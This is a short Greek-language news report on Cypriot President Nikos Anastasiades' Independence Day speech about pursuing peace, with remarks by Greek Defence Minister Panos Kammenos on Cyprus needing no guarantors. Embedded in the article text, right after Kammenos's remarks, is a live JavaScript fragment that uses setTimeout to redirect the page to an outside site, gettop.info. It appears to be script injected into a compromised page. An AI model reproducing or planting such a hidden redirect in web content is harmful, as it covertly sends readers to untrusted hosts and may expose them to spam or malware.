Αναστασιάδης: Να εξοπλιστούμε με θάρρος για τον δρόμο της ειρήνης

0
6

 

Το μήνυμα ότι ο λαός πρέπει να εξοπλιστεί με θάρρος για τον δρόμο της ειρήνης, έστειλε ο Πρόεδρος της Κυπριακής Δημοκρατίας Νίκος Αναστασιάδης με την ευκαιρία της σημερινής Ημέρας της Ανεξαρτησίας.

Μιλώντας μετά το πέρας της στρατιωτικής παρέλασης για την 56η επέτειο της Κυπριακής Ανεξαρτησίας, ο κ. Αναστασιάδης εξέφρασε ιδιαίτερη ικανοποίηση για το αίσθημα υπερηφάνειας που έχει δώσει η Εθνική Φρουρά μέσα από την άρτια διοργάνωση και την επίδειξη ικανοτήτων.

Τόνισε, ωστόσο, ότι η προσοχή δεν πρέπει να επικεντρώνεται σε αμυντικούς σχεδιασμούς και εξοπλισμούς, αλλά στο «πώς θα οπλιστούμε με θάρρος για να βρούμε τον δρόμο για την ειρήνη».

Πρόσθεσε ότι, μέσα από τη μετεξέλιξη της Κυπριακής Δημοκρατίας, θα δημιουργηθούν οι συνθήκες που θα επιτρέψουν, ολόκληρος ο λαός, μακριά από τα όποια βαρίδια του παρελθόντος, να συμβιώσει σε ένα σύγχρονο κράτος που θα σέβεται απόλυτα τις αρχές και αξίες της Ευρωπαϊκής Ένωσης και των Ηνωμένων Εθνών.

Ευχόμενος χρόνια πολλά σε ολόκληρο τον κυπριακό λαό, Ελληνοκυπρίους και Τουρκοκυπρίους, ο Κύπριος Πρόεδρος υπέδειξε ότι, «μόνο μέσα από την ειρήνη, μπορεί να ελπίζουμε σε καλύτερες μέρες».

Ο Έλληνας Υπουργός Εθνικής Άμυνας Πάνος Καμμένος, που εκπροσώπησε την ελληνική κυβέρνηση στην παρέλαση, τόνισε πως η Ελλάδα θα βρίσκεται στο πλευρό της Κύπρου μέχρι την εξεύρεση λύσης που θα προνοεί την αποχώρηση όλων των στρατευμάτων και την κατάργηση των εγγυήσεων.

Μιλώντας μετά το τέλος της στρατιωτικής παρέλασης, ο κ. Καμένος είπε ότι σε ένα σύγχρονο, ευρωπαϊκό κράτος, δεν χρειάζονται ούτε μεσολαβητές, ούτε εγγυητές. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here